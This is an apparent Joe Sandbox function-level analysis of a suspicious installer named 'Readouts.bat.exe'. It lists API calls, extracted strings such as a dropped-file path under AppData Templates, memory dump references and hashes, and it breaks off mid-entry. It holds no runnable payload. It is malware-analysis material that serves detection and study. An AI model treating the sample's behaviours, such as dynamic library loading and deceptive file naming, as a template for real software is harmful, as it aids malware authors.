C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness, xrefs: 0040483C
6B, xrefs: 004047E9
A, xrefs: 0040480F
Call, xrefs: 0040484D, 00404852, 0040485D

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness$Call$6B
API String ID: 2624150263-1518062809
Opcode ID: b8618f90b922676de7d58afc90790895c774f735f5804d4ec160b51eadca24d3
Instruction ID: 1fca52776cba06a1556b538b397dade1a16f07a9c9d6655049f3c7fe444e155e
Opcode Fuzzy Hash: b8618f90b922676de7d58afc90790895c774f735f5804d4ec160b51eadca24d3
Instruction Fuzzy Hash: B4A180F1A00209ABDB11AFA6CD45AAF77B8EF84714F10843BF601B62D1D77C99418B6D

Function 6FBF1B63 Relevance: 20.1, APIs: 13, Instructions: 576stringlibrarymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6FBF121B: GlobalAlloc.KERNEL32(00000040,?,6FBF123B,?,6FBF12DF,00000019,6FBF11BE,-000000A0), ref: 6FBF1225

GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 6FBF1C6F
lstrcpyW.KERNEL32(00000008,?), ref: 6FBF1CB7
lstrcpyW.KERNEL32(00000808,?), ref: 6FBF1CC1
GlobalFree.KERNEL32(00000000), ref: 6FBF1CD4
GlobalFree.KERNEL32(?), ref: 6FBF1DB6
GlobalFree.KERNEL32(?), ref: 6FBF1DBB
GlobalFree.KERNEL32(?), ref: 6FBF1DC0
GlobalFree.KERNEL32(00000000), ref: 6FBF1FAA
lstrcpyW.KERNEL32(?,?), ref: 6FBF2144
GetModuleHandleW.KERNEL32(00000008), ref: 6FBF21B9
LoadLibraryW.KERNEL32(00000008), ref: 6FBF21CA
GetProcAddress.KERNEL32(?,?), ref: 6FBF2224
lstrlenW.KERNEL32(00000808), ref: 6FBF223E

Memory Dump Source

Source File: 00000000.00000002.2200727678.000000006FBF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FBF0000, based on PE: true

Associated: 00000000.00000002.2200703347.000000006FBF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2200746589.000000006FBF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2200767970.000000006FBF5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fbf0000_Readouts.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 245916457-0
Opcode ID: da11325d93f8a4ffefd06ca3d25ca088a1a5858480d9a75ebac03f920cef3c3d
Instruction ID: 339828f2752f29e8f45c56df145ac6255e5bbfbde5cda0c43f69d77169b0b511
Opcode Fuzzy Hash: da11325d93f8a4ffefd06ca3d25ca088a1a5858480d9a75ebac03f920cef3c3d
Instruction Fuzzy Hash: E622CCB5D066C9EBCB10CFB8E9806EEB7B0FF05315F544A2AD0A5E7180D770668B8B50

Function 00402104 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004084DC,?,?,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Cassoon, xrefs: 004021C3

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Cassoon
API String ID: 542301482-85625676
Opcode ID: 5e736e3766f6f2c84d9b8d1786969cf60f007173139c094a39c5795cedf387ff
Instruction ID: 3f6190fb0288cb4cc2191ecfdaddaa4006c381b8c0a92558cc12242fdf246284
Opcode Fuzzy Hash: 5e736e3766f6f2c84d9b8d1786969cf60f007173139c094a39c5795cedf387ff
Instruction Fuzzy Hash: C9414B71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E0DBB99981CB54

Function 00402868 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 48d5054ae9fa3c66534243b530be4ac77275d228a2fdf316ae35e55088bcbc9e
Instruction ID: 42b58e9376e2aae4a6b7d1f769ff68ee5b2b2e9610aeafae56754381977d23d8
Opcode Fuzzy Hash: 48d5054ae9fa3c66534243b530be4ac77275d228a2fdf316ae35e55088bcbc9e
Instruction Fuzzy Hash: FCF08271A14104EFDB10EBA4DE499AEB378EF04314F6045BBF505F21E1DBB45D419B2A

Function 004043BA Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,?), ref: 00404458
GetDlgItem.USER32(?,000003E8), ref: 0040446C
SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 00404489
GetSysColor.USER32(?), ref: 0040449A
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044A8
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044B6
lstrlenW.KERNEL32(?), ref: 004044BB
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044C8
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044DD
GetDlgItem.USER32(?,0000040A), ref: 00404536
SendMessageW.USER32(00000000), ref: 0040453D
GetDlgItem.USER32(?,000003E8), ref: 00404568
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045AB
LoadCursorW.USER32(00000000,00007F02), ref: 004045B9
SetCursor.USER32(00000000), ref: 004045BC
LoadCursorW.USER32(00000000,00007F00), ref: 004045D5
SetCursor.USER32(00000000), ref: 004045D8
SendMessageW.USER32(00000111,?,00000000), ref: 00404607
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404619

Strings

N, xrefs: 00404556
1C@, xrefs: 004045C4
Call, xrefs: 00404597

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: 1C@$Call$N
API String ID: 3103080414-3974410273
Opcode ID: 5f098caee5535ae1e7b5b61cf078335e238ade03d1551e6bec200614ec9300dd
Instruction ID: 9026ebbe03bb6d5dcd5a9bde039089338ffc2a6a86adc40c9d49ddbc6b033b78
Opcode Fuzzy Hash: 5f098caee5535ae1e7b5b61cf078335e238ade03d1551e6bec200614ec9300dd
Instruction Fuzzy Hash: D161A3B1A00209BFDB109F60DD45EAA7B79FB94305F00853AF705B62E0D779A952CF68

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,?), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429200,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
Instruction ID: 53e7ac87f6412b54f62e8112edad18e9e8f6d31619aee210d26213a62ff7d26c
Opcode Fuzzy Hash: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
Instruction Fuzzy Hash: 88418A71800209AFCF058FA5DE459AF7BB9FF44310F00842AF991AA1A0C738D955DFA4

Function 00405ED0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,0040606B,?,?), ref: 00405F0B
GetShortPathNameW.KERNEL32(?,00426D88,00000400), ref: 00405F14

Part of subcall function 00405CDF: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
Part of subcall function 00405CDF: lstrlenA.KERNEL32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D21

GetShortPathNameW.KERNEL32(?,00427588,00000400), ref: 00405F31
wsprintfA.USER32 ref: 00405F4F
GetFileSize.KERNEL32(00000000,00000000,00427588,C0000000,00000004,00427588,?,?,?,?,?), ref: 00405F8A
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F99
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD1
SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,00426988,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406027
GlobalFree.KERNEL32(00000000), ref: 00406038
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040603F

Part of subcall function 00405D7A: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Readouts.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
Part of subcall function 00405D7A: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0

Strings

%ls=%ls, xrefs: 00405F45
[Rename], xrefs: 00405FB9, 00405FCB

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 452d6bb901878c0c7833dd9b0da621d42dccc5e8693507b5b61e49e3263f6faa
Instruction ID: cb5629e100ec4411e7767e9ff1715c79388972a83a2f5f57e92a2ee479f5e204
Opcode Fuzzy Hash: 452d6bb901878c0c7833dd9b0da621d42dccc5e8693507b5b61e49e3263f6faa
Instruction Fuzzy Hash: 92313571240B19BBD230AB659D48F6B3A5CEF45744F15003BF906F72D2EA7C98118ABD

Function 00406518 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Readouts.bat.exe",00403334,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3,?,00000006,00000008,0000000A), ref: 0040657B
CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040658A
CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Readouts.bat.exe",00403334,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3,?,00000006,00000008,0000000A), ref: 0040658F
CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Readouts.bat.exe",00403334,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3,?,00000006,00000008,0000000A), ref: 004065A2

Strings

"C:\Users\user\Desktop\Readouts.bat.exe", xrefs: 00406518
C:\Users\user\AppData\Local\Temp\, xrefs: 00406519, 0040651E
*?|<>/":, xrefs: 0040656A

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\Readouts.bat.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-3265588509
Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
Instruction ID: 9d8e3f8f3784457604ea521ff392e3c8e3efc90107dbe880bee10e7696629eb6
Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
Instruction Fuzzy Hash: AB11B655800616A5DB303B18BC44A7762F8AF54B60F92403FED89736C5F77C5C9286BD

Function 00404262 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040427F
GetSysColor.USER32(00000000), ref: 004042BD
SetTextColor.GDI32(?,00000000), ref: 004042C9
SetBkMode.GDI32(?,?), ref: 004042D5
GetSysColor.USER32(?), ref: 004042E8
SetBkColor.GDI32(?,?), ref: 004042F8
DeleteObject.GDI32(?), ref: 00404312
CreateBrushIndirect.GDI32(?), ref: 0040431C

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction ID: 0f30b588a8d7f9bbf1461c481b53b443173021fc121084549064eaca6d41b1d8
Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction Fuzzy Hash: CD2174716007059FCB319F68DE48A5BBBF8AF81711B048A3EFD96A26E0D734D944CB54

Function 6FBF2398 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 6FBF24DA

Part of subcall function 6FBF122C: lstrcpynW.KERNEL32(00000000,?,6FBF12DF,00000019,6FBF11BE,-000000A0), ref: 6FBF123C

GlobalAlloc.KERNEL32(00000040), ref: 6FBF2460
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6FBF247B

Strings

@Hmu, xrefs: 6FBF2494

Memory Dump Source

Source File: 00000000.00000002.2200727678.000000006FBF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FBF0000, based on PE: true

Associated: 00000000.00000002.2200703347.000000006FBF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2200746589.000000006FBF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2200767970.000000006FBF5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fbf0000_Readouts.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID: @Hmu
API String ID: 4216380887-887474944
Opcode ID: 9d83aa440f133ce0e0becb04e925c11a8cd32fd6947595f81b94a574c1f65ad5
Instruction ID: df1c3c6eff2e1074de8fead042e3d288b4693d788721a816f00b65521ba9ce3c
Opcode Fuzzy Hash: 9d83aa440f133ce0e0becb04e925c11a8cd32fd6947595f81b94a574c1f65ad5
Instruction Fuzzy Hash: A941ACB000A7C5EFD714DF79F940AAA77A8FB85324B004A5EE546C7580D770A48FCB61

Function 00404BB6 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BD1
GetMessagePos.USER32 ref: 00404BD9
ScreenToClient.USER32(?,?), ref: 00404BF3
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C05
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C2B

Strings

f, xrefs: 00404C07

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction ID: ae0188e128420319643ad50796f74bd77cac7447aa244d18a8bf097087cf05ab
Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction Fuzzy Hash: 9C019E7190021CBAEB00DB94DD81BFFBBBCAF95711F10412BBB10B61D0C7B499418BA4

Function 00402DF3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,?,000000FA,00000000), ref: 00402E11
MulDiv.KERNEL32(000F28B5,00000064,000F2AB9), ref: 00402E3C
wsprintfW.USER32 ref: 00402E4C
SetWindowTextW.USER32(?,?), ref: 00402E5C
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E

Strings

verifying installer: %d%%, xrefs: 00402E46

Memory Dump Source

Source File: 00000000.00000002.2164656288.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2163319765.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164782968.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2164822509.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2167335891.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Readouts.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 66d2592fca5784473147c8150b099ced33c2aea089bdfd78c1b867d04e1d1f0a
Instruction ID: 4bcbb139cde21edcf0ff7b700e9789e452b98774f77cb7efe3bd4e4e9d403b43
Opcode Fuzzy Hash: 66d2592fca5784473147c8150b099ced33c2aea089bdfd78c1b867d04e1d1f0a
Instruction Fuzzy Hash: C701F47154020CABDF209F60DE49FAA3B69EB44705F008439FA45B51E0DBB995558F98

Function 6FBF256D Relevance: 9.1, APIs: 6, Instructions: 109COMMON

Download Yara Rule

APIs

Part of subcall function 6FBF121B: GlobalAlloc.KERNEL32(00000040,?,6FBF123B,?,6FBF12DF,00000019,6FBF11BE,-000000A0), ref: 6FBF1225

GlobalFree.KERNEL32(?), ref: 6FBF265B
GlobalFree.KERNEL32(00000000), ref: 6FBF2690

Memory Dump Source

Source File: 00000000.00000002.2200727678.000000006FBF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FBF0000, based on PE: true

Associated: 00000000.00000002.2200703347.000000006FBF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2200746589.000000006FBF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2200767970.000000006FBF5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fbf0000_Readouts.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 4962a02234e0abb90451fdb835a69689ab3619d178ad395481c6dd35ba9f3239
Instruction ID: 1f659593d8d74bec93b0c4930af6398bd647b403be6d60ed8e7317df08796ec9
